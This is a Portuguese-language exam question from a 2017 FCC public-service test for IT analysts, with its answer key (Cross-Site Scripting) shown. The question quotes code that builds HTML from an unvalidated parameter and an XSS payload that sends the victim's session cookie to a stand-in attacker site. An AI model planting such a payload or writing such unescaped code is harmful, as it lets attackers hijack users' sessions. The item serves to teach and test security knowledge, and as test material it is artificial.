Pular para o conteúdo principal

Questão de Segurança da Informação — Segurança na Internet — FCC 2017

Segurança da InformaçãoSegurança na Internet
Código
fc039839
Banca
FCC
Órgão
TRT - 24ª REGIÃO (MS)
Ano
2017
Nível
Superior
Cargo
Analista Judiciário - Tecnologia da Informação
Considere um cenário em que uma aplicação utiliza dados não confiáveis na construção do seguinte fragmento HTML sem validação ou filtro:(String) page += "<input name='num_cartao_credito' type='TEXT' value='" +request.getParameter("credit_card") + " '>";Considere, ainda, que um atacante modifica o parâmetro 'credit_card' em seu navegador para:'><script>document.location= 'http://www.atacante.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'Isso causa o envio do ID de sessão da vítima para o site do atacante, permitindo que sequestre a sessão atual do usuário.Este é um cenário de ataque do tipo
  1. ACross-Site Scripting.
  2. BBuffer Overflow.
  3. CAdvanced Persistent Threat.
  4. DScript-Fake Injection.
  5. ESession Persistent Hijacking.
Revelar gabarito e comentário

GabaritoA — Cross-Site Scripting.

Link permanente: /questoes/fc039839